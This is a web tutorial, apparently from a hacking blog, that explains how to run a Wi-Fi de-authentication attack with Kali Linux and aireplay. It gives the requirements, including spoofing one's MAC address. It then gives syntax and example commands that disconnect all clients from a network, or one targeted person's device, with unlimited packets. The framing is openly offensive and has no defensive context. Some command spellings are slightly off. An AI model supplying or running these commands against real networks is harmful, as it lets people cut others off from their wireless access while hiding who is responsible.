Skip to content

DE-AUTHENTICATION ATTACK


Disconnects any client from any network.

  • Works on encrypted networks (WEP, WPA, WPA2)
  • No need to know the network key/password/passphrase.
  • No need to connect to the network.

You can find a detailed explanation for Deauth Attacks form here Concept of De-authentication Attack.

 Requirements:

  •  Need Kali Linux installed as a host or as a virtual machine. We generally use Kali Linux as a Virtual Machine. Check this link for how to Install Kali Linux in Virtual Machine.
  •  Get the MAC Address/BSSID for the router/access point. Check the section How to scan nearby wireless networks of the post Wireless Network Sniffing.
  •  If want to attack a person get the MAC Address/BSSID of the target. Check the section How to scan a specific network of the post Wireless Network Sniffing to get the MAC of a particular person.
  •  Wireless Adapter which supports Monitor Mode.We are using ALPHA AWUS036NHA which has an Atheros AR9271 chipset.
  •  Your wireless adapter should be in Monitor Mode. Check this link for how to Enable Monitor Mode for Wireless Adapter.
  •  It’s good practice to change your MAC Address before scanning. Check this link for how to Change MAC Address in Kali Linux.

Deauth Attacks

How to deauth everyone from a network

In terminal, type:

  • Syntax

aireplay –deauth <no._of_packets> -a <AP_MAC> <adapter_name> 

  •  –deauth: to tell it’s a de-authentication attack. Instead of –deauth you can type -0.
  •  <no._of_packets>: specifies how many numbers of packets you want to send for deauth. (Zero) means infinite or send packet continuously.
  •  -a: is an option where you need to specify Target’s router MAC Address.
  •  <adpater_name>: type the adapter which is in monitor mode.
    • Example: 
            aireplay --deauth 0 -a e2:33:44:55:66:77 wlan0
    •  Sending infinite packets to the router’s mac address (e2:33:44:55:66:77) using the wireless adapter (wlan0) which is in monitor mode.

      How to deauth specific device from a network

      In terminal, type:

      • Syntax: 

      aireplay -0 <no._of_packets> -a <AP_MAC> -c <target’s_mac> <adapter_name>

      •  -0: is the short version of writing –deauth.
      •  -c: is option where you need to specify Target’s Device’s MAC Address.
        • Example: 
        aireplay -0 0 -a e2:33:44:55:66:77 -c e2:22:33:44:55:66 wlan0  
        •  Sending infinite packets to Target’s Device (e2:22:33:44:55:66) which is connected to the router (e2:33:44:55:66:77) using the wireless adapter (wlan0) which is in monitor mode.

          Video Tutorial 

          Reference: https://www.hackhunt.in/2020/11/de-authentication-attack.html